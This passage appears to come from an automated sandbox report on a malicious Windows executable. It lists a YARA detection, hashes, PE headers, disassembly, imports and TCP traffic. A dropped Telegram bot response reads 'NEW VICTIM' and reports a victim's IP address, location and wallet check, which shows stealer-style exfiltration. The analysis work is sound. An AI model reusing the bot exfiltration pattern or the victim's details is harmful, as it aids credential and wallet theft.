                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, Author: ditekSHen
                                                                                                                                                                Preview:.PNG........IHDR................p....IDATx....|.e....3......D dw6...S..Y.[......#*L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.*....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

                                                                                                                                                                C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):776
                                                                                                                                                                Entropy (8bit):5.111417579302489
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:YKOHM0y1JVBa4YGQVPe071kWoPyoZEB6BasJENBm9c:YVHM0QTBj/Q51UPtZ7ujMc
                                                                                                                                                                MD5:68B7EC7CFC89E2C83C1E17DE9E26E46A
                                                                                                                                                                SHA1:E4787AD96FAE497E95D30548D86814C6718F028A
                                                                                                                                                                SHA-256:EF1516C166403695538099706F2F9FC25F8DECB50EE148099234BF12316C84D6
                                                                                                                                                                SHA-512:6E52976B909F0E690A9C98A3B7D91C6193B9891C0F20200401BE54FCCE9D57B1535F2D7342575735795775F929E40CE862BCAE6F32EB9F18856E134B0B9C58E1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"ok":true,"result":{"message_id":3332,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734019285,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 648351\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}

                                                                                                                                                                Static File Info

                                                                                                                                                                General

                                                                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Entropy (8bit):6.377818589865092
                                                                                                                                                                TrID:
                                                                                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                File name:file.exe
                                                                                                                                                                File size:605'696 bytes
                                                                                                                                                                MD5:3567cb15156760b2f111512ffdbc1451
                                                                                                                                                                SHA1:2fdb1f235fc5a9a32477dab4220ece5fda1539d4
                                                                                                                                                                SHA256:0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630
                                                                                                                                                                SHA512:e7a31b016417218387a4702e525d33dd4fe496557539b2ab173cec0cb92052c750cfc4b3e7f02f3c66ac23f19a0c8a4eb6c9d2b590a5e9faeb525e517bc877ba
                                                                                                                                                                SSDEEP:12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
                                                                                                                                                                TLSH:E5D45C1666A800FCE1EBD238CA574513FA76B84603A19ADF13D097672F176E09F3E721
                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B........v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw.....

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:00928e8e8686b000

                                                                                                                                                                Static PE Info

                                                                                                                                                                General

                                                                                                                                                                Entrypoint:0x14004320c
                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                Digitally signed:false
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                Time Stamp:0x6731B531 [Mon Nov 11 07:41:37 2024 UTC]
                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                OS Version Major:6
                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                File Version Major:6
                                                                                                                                                                File Version Minor:0
                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                Import Hash:b1d65f7e4aa92d9c11708d0d9ee127a1

                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                Instruction
                                                                                                                                                                dec eax
                                                                                                                                                                sub esp, 28h
                                                                                                                                                                call 00007F02D51BD1D8h
                                                                                                                                                                dec eax
                                                                                                                                                                add esp, 28h
                                                                                                                                                                jmp 00007F02D51BC92Fh
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                dec eax
                                                                                                                                                                sub esp, 28h
                                                                                                                                                                dec ebp
                                                                                                                                                                mov eax, dword ptr [ecx+38h]
                                                                                                                                                                dec eax
                                                                                                                                                                mov ecx, edx
                                                                                                                                                                dec ecx
                                                                                                                                                                mov edx, ecx
                                                                                                                                                                call 00007F02D51BCAC2h
                                                                                                                                                                mov eax, 00000001h
                                                                                                                                                                dec eax
                                                                                                                                                                add esp, 28h
                                                                                                                                                                ret
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                inc eax
                                                                                                                                                                push ebx
                                                                                                                                                                inc ebp
                                                                                                                                                                mov ebx, dword ptr [eax]
                                                                                                                                                                dec eax
                                                                                                                                                                mov ebx, edx
                                                                                                                                                                inc ecx
                                                                                                                                                                and ebx, FFFFFFF8h
                                                                                                                                                                dec esp
                                                                                                                                                                mov ecx, ecx
                                                                                                                                                                inc ecx
                                                                                                                                                                test byte ptr [eax], 00000004h
                                                                                                                                                                dec esp
                                                                                                                                                                mov edx, ecx
                                                                                                                                                                je 00007F02D51BCAC5h
                                                                                                                                                                inc ecx
                                                                                                                                                                mov eax, dword ptr [eax+08h]
                                                                                                                                                                dec ebp
                                                                                                                                                                arpl word ptr [eax+04h], dx
                                                                                                                                                                neg eax
                                                                                                                                                                dec esp
                                                                                                                                                                add edx, ecx
                                                                                                                                                                dec eax
                                                                                                                                                                arpl ax, cx
                                                                                                                                                                dec esp
                                                                                                                                                                and edx, ecx
                                                                                                                                                                dec ecx
                                                                                                                                                                arpl bx, ax
                                                                                                                                                                dec edx
                                                                                                                                                                mov edx, dword ptr [eax+edx]
                                                                                                                                                                dec eax
                                                                                                                                                                mov eax, dword ptr [ebx+10h]
                                                                                                                                                                mov ecx, dword ptr [eax+08h]
                                                                                                                                                                dec eax
                                                                                                                                                                mov eax, dword ptr [ebx+08h]
                                                                                                                                                                test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                                je 00007F02D51BCABDh
                                                                                                                                                                movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                                                                and eax, FFFFFFF0h
                                                                                                                                                                dec esp
                                                                                                                                                                add ecx, eax
                                                                                                                                                                dec esp
                                                                                                                                                                xor ecx, edx
                                                                                                                                                                dec ecx
                                                                                                                                                                mov ecx, ecx
                                                                                                                                                                pop ebx
                                                                                                                                                                jmp 00007F02D51BBF8Ah
                                                                                                                                                                int3
                                                                                                                                                                dec eax
                                                                                                                                                                mov eax, esp
                                                                                                                                                                dec eax
                                                                                                                                                                mov dword ptr [eax+08h], ebx
                                                                                                                                                                dec eax
                                                                                                                                                                mov dword ptr [eax+10h], ebp
                                                                                                                                                                dec eax
                                                                                                                                                                mov dword ptr [eax+18h], esi
                                                                                                                                                                dec eax
                                                                                                                                                                mov dword ptr [eax+20h], edi
                                                                                                                                                                inc ecx
                                                                                                                                                                push esi
                                                                                                                                                                dec eax
                                                                                                                                                                sub esp, 20h
                                                                                                                                                                dec ecx
                                                                                                                                                                mov ebx, dword ptr [ecx+38h]
                                                                                                                                                                dec eax
                                                                                                                                                                mov esi, edx
                                                                                                                                                                dec ebp
                                                                                                                                                                mov esi, eax
                                                                                                                                                                dec eax
                                                                                                                                                                mov ebp, ecx
                                                                                                                                                                dec ecx
                                                                                                                                                                mov edx, ecx
                                                                                                                                                                dec eax
                                                                                                                                                                mov ecx, esi
                                                                                                                                                                dec ecx
                                                                                                                                                                mov edi, ecx
                                                                                                                                                                dec esp
                                                                                                                                                                lea eax, dword ptr [ebx+04h]
                                                                                                                                                                call 00007F02D51BCA21h

                                                                                                                                                                Data Directories

                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8be980xb4.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x960000x448.rsrc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x910000x4c74.pdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x970000xb90.reloc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x804800x70.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x806800x28.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x803400x140.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x700000x4a8.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                Sections

                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                .text0x10000x6ec3e0x6ee00e5d9e86ceef61c40af75d00b1338553dFalse0.4871956912344983data6.39857414841088IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                .rdata0x700000x1ce640x1d000cc5419dfe862265139bacec5ab07010eFalse0.44227337015086204data5.432264074009666IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .data0x8d0000x3bec0x1c00cd69d42d368ffc43ed3d9449389d5e0dFalse0.16378348214285715DOS executable (block device driver)3.2710072108015398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .pdata0x910000x4c740x4e00eb4cdabd0756133d95aec7355655271aFalse0.4788661858974359data5.735627608296407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .rsrc0x960000x4480x6001e9590800244ea67bbd5f82b3a6f4221False0.3580729166666667data3.380125227099815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .reloc0x970000xb900xc005ce72d9d30afddbdf14b43241fe9c99bFalse0.4889322916666667data5.370062744008093IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                Resources

                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                RT_VERSION0x960a00x220dataEnglishUnited States0.5036764705882353
                                                                                                                                                                RT_MANIFEST0x962c00x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143

                                                                                                                                                                Imports

                                                                                                                                                                DLLImport
                                                                                                                                                                KERNEL32.dllGetEnvironmentVariableW, InitializeCriticalSectionEx, FindClose, OpenProcess, CreateToolhelp32Snapshot, GetLastError, Process32NextW, K32GetModuleBaseNameW, DeleteFileW, Process32FirstW, CloseHandle, TerminateProcess, DecodePointer, DeleteCriticalSection, ExitProcess, CreateProcessW, WideCharToMultiByte, GetConsoleWindow, K32EnumProcessModules, MultiByteToWideChar, WriteConsoleW, SetEndOfFile, GetProcessHeap, SetEnvironmentVariableW, FindNextFileW, FindFirstFileW, K32EnumProcesses, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, HeapSize, HeapReAlloc, GetTimeZoneInformation, SetStdHandle, ReadConsoleW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, FlsFree, FlsSetValue, FlsGetValue, FlsAlloc, LocalFree, FormatMessageA, GetLocaleInfoEx, CreateDirectoryW, CreateFileW, FindFirstFileExW, GetFileAttributesExW, SetFileInformationByHandle, AreFileApisANSI, GetModuleHandleW, GetProcAddress, GetFileInformationByHandleEx, QueryPerformanceCounter, QueryPerformanceFrequency, GetStringTypeW, GetCurrentThreadId, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, SleepConditionVariableSRW, Sleep, WaitForSingleObjectEx, GetExitCodeThread, GetSystemTimeAsFileTime, EnterCriticalSection, LeaveCriticalSection, EncodePointer, LCMapStringEx, WakeAllConditionVariable, GetCPInfo, IsDebuggerPresent, OutputDebugStringW, RaiseException, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, GetStartupInfoW, GetCurrentProcessId, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetModuleHandleExW, CreateThread, ExitThread, FreeLibraryAndExitThread, GetFileType, ReadFile, GetModuleFileNameW, GetStdHandle, WriteFile, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, HeapAlloc, RtlUnwind
                                                                                                                                                                USER32.dllShowWindow
                                                                                                                                                                ADVAPI32.dllRegSetValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                                ole32.dllCoInitialize, CoInitializeEx, CoCreateInstance, CoUninitialize
                                                                                                                                                                OLEAUT32.dllSysFreeString, SysAllocString, VariantClear, VariantInit
                                                                                                                                                                WS2_32.dllWSAStartup, WSACleanup, gethostname
                                                                                                                                                                NETAPI32.dllNetUserEnum, NetApiBufferFree
                                                                                                                                                                WININET.dllInternetOpenUrlA, InternetCloseHandle, InternetOpenA, InternetReadFile

                                                                                                                                                                Possible Origin

                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                EnglishUnited States

                                                                                                                                                                Network Behavior

                                                                                                                                                                Network Port Distribution

                                                                                                                                                                TCP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Dec 12, 2024 17:01:10.913057089 CET49704443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:10.913090944 CET44349704216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:10.913166046 CET49704443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:10.924334049 CET49704443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:10.924350977 CET44349704216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:11.577609062 CET49705443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:11.577651978 CET44349705216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:11.577821016 CET49705443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:11.591100931 CET49705443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:11.591123104 CET44349705216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:12.627866030 CET44349704216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:12.628078938 CET49704443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:12.629010916 CET44349704216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:12.630538940 CET49704443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:12.717315912 CET49704443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:12.717334032 CET44349704216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:12.717752934 CET44349704216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:12.717839003 CET49704443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:12.727536917 CET49704443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:12.775345087 CET44349704216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:13.307495117 CET44349705216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:13.307578087 CET49705443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:13.308547974 CET44349705216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:13.308614016 CET49705443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:13.367054939 CET49705443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:13.367079020 CET44349705216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:13.367556095 CET44349705216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:13.367611885 CET49705443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:13.370518923 CET49705443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:13.415338039 CET44349705216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:13.574201107 CET44349704216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:13.574374914 CET49704443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:13.574388981 CET44349704216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:13.574481010 CET49704443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:13.574542046 CET49704443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:13.574596882 CET44349704216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:13.574664116 CET49704443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:13.731854916 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:13.731906891 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:13.731993914 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:13.732264042 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:13.732276917 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:14.221431971 CET44349705216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:14.221503973 CET49705443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:14.221520901 CET44349705216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:14.221565962 CET49705443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:14.221651077 CET49705443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:14.221692085 CET44349705216.58.208.238192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:14.221745968 CET49705443192.168.2.5216.58.208.238
                                                                                                                                                                Dec 12, 2024 17:01:14.224740028 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:14.224781990 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:14.224868059 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:14.225369930 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:14.225382090 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:15.430512905 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:15.430604935 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:15.834538937 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:15.834580898 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:15.835037947 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:15.835104942 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:15.835539103 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:15.883342028 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:15.918199062 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:15.918334007 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:15.926095009 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:15.926115990 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:15.926412106 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:15.926474094 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:15.926901102 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:15.967359066 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.594044924 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.594115019 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.608295918 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.608392000 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.712929964 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.713025093 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.717206001 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.717263937 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.717950106 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.718003035 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.784961939 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.788878918 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.788913012 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.789798975 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.789810896 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.789850950 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.794576883 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.797697067 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.802311897 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.802367926 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.803893089 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.804004908 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.811563015 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.811624050 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.814147949 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.814202070 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.820739031 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.820854902 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.827891111 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.827944994 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.830585957 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.830635071 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.841392994 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.841451883 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.844419003 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.844475031 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.855066061 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.855129004 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.858093023 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.858247995 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.869076014 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.869136095 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.872185946 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.872242928 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.882864952 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.882941008 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.885885000 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.886028051 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.895972967 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.896032095 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.899128914 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.899188042 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.909919024 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.909971952 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.909979105 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.910022020 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.924923897 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.924978018 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.948792934 CET44349706172.217.17.65192.168.2.5
